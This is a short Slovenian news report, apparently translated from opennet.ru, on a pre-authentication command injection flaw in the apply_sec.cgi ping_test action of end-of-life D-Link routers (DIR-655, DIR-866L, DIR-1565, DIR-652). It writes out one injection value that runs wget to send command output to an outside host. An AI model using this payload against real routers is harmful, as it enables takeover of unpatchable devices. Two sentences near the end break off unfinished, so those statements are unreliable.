V brezžičnih usmerjevalnikih D-Link
Zanimivo je, da naj bi se po mnenju razvijalcev strojne programske opreme klic »ping_test« izvedel šele po preverjanju pristnosti, v resnici pa se kliče v vsakem primeru, ne glede na prijavo v spletni vmesnik. Zlasti pri dostopu do skripta apply_sec.cgi in posredovanju parametra »action=ping_test« skript preusmeri na stran za preverjanje pristnosti, vendar hkrati izvede dejanje, povezano s ping_testom. Za izvedbo kode je bila v samem ping_test uporabljena druga ranljivost, ki pokliče pripomoček ping, ne da bi pravilno preverila pravilnost naslova IP, poslanega v testiranje. Na primer, če želite poklicati pripomoček wget in prenesti rezultate ukaza »echo 1234« na zunanjega gostitelja, samo podajte parameter »ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Prisotnost ranljivosti je bila uradno potrjena v naslednjih modelih:
- DIR-655 z vdelano programsko opremo 3.02b05 ali starejšo;
- DIR-866L z vdelano programsko opremo 1.03b04 ali starejšo;
- DIR-1565 z vdelano programsko opremo 1.01 ali starejšo;
- DIR-652 (ni podatkov o problematičnih različicah vdelane programske opreme)
Obdobje podpore za te modele je že poteklo, zato D-Link
Kasneje je bilo ugotovljeno, da je bila ranljivost tudi
Vir: opennet.ru